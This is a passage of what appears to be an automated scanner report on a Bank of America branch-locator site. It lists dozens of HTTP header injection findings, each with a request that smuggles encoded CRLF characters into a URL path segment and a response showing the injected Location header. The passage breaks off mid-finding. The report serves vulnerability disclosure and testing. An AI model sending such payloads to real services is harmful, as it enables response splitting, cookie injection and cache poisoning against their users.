User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=460D02823ABE09BBCDE02308A49D0C6D.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/702a4
7c15066c6ba/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.115. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d988a%0d%0a0b1d70aa22 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/d988a%0d%0a0b1d70aa22=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=853154BC92AAF601441C31B6DF28989E.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/d988a
0b1d70aa22=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.116. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 7901c%0d%0ac037e803a1e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7901c%0d%0ac037e803a1e/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=3A1639A9C611ACF85517E0DC7E6AC15C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7901c
c037e803a1e/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.117. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 380b8%0d%0a760cd1cd3fc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/380b8%0d%0a760cd1cd3fc/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=50D7C39E62199E30D741C6E97E065BAE.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/380b8
760cd1cd3fc/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.118. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5d910%0d%0a21a6aeaafe1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/5d910%0d%0a21a6aeaafe1/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=3EC4C815A4AF9B6FE8FAEC64EF0A9B14.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/5d910
21a6aeaafe1/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.119. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6417f%0d%0a20589873cf3 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/6417f%0d%0a20589873cf3/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=1B27525541B0E13563121F4C0DD112AF.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/6417f
20589873cf3/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.120. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 746f6%0d%0a65119124b1f was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/746f6%0d%0a65119124b1f=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=AD09D3CB86F968CF8CA29272453E916F.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/746f6
65119124b1f=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.121. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 424c0%0d%0a6a77877befc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/424c0%0d%0a6a77877befc/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=675664F1712DA95524DA09E0B98BFAD0.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/424c0
6a77877befc/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.122. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8a36b%0d%0a4207afa73ca was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/8a36b%0d%0a4207afa73ca/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=30FAC0302D18197DEB1CDBF10A732526.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/8a36b
4207afa73ca/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.123. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 8ff7e%0d%0a22d8764a9f7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/8ff7e%0d%0a22d8764a9f7/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=2C7C1DE71623372DAC10C1467D5287A7.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/8ff7e
22d8764a9f7/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.124. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 32dc1%0d%0a57d9e3475a9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/32dc1%0d%0a57d9e3475a9/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:15 GMT
Server: Apache
Set-Cookie: JSESSIONID=9814E01B87CD235BD53EFCF2F6BE1B62.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/32dc1
57d9e3475a9/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.125. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e7c1c%0d%0acdc45660e6a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/e7c1c%0d%0acdc45660e6a=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=06E584E28DD0976A403536A3917D74C8.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/e7c1c
cdc45660e6a=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.126. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload eafed%0d%0a7062bfbd8e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/eafed%0d%0a7062bfbd8e/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=B04D8F20350A76D02BFB1D9A341CD1AB.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/eafed
7062bfbd8e/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.127. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 61ee5%0d%0a50582ad880d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/61ee5%0d%0a50582ad880d/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=6FAB2BC6B0BA5174E7023D5DEE842345.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/61ee5
50582ad880d/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.128. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6b070%0d%0a2f1717a4428 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/6b070%0d%0a2f1717a4428/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=60ED25BB1258D37CB8AC1FB9F777AD65.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/6b070
2f1717a4428/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.129. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5c518%0d%0a800aac22e33 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/5c518%0d%0a800aac22e33/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=6AA01EEC6F9F7F9A73E42AC7539B1F92.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/5c518
800aac22e33/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.130. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 19bc3%0d%0a477f9306d5c was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/19bc3%0d%0a477f9306d5c=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:14 GMT
Server: Apache
Set-Cookie: JSESSIONID=6825DA7C85CD2C9698801F955DDFC8FD.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/19bc3
477f9306d5c=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.131. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 359fe%0d%0af2242ab55d6 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/359fe%0d%0af2242ab55d6/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=0FE71370CB00E0780026FA58F1AC772F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/359fe
f2242ab55d6/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.132. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3706a%0d%0a113d674e274 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/3706a%0d%0a113d674e274/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=7E0BF2E319DC87EA12AEF687125847E0.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/3706a
113d674e274/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.133. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a31fd%0d%0ac6c250b405b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/a31fd%0d%0ac6c250b405b/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=6FB6ADD8113A7655762DC686ED951686.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/a31fd
c6c250b405b/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.134. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload dcf0c%0d%0ad5e5e15b6cc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/dcf0c%0d%0ad5e5e15b6cc/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:33 GMT
Server: Apache
Set-Cookie: JSESSIONID=307A95E5A348007BDDBFBA557323B70F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/dcf0c
d5e5e15b6cc/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.135. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
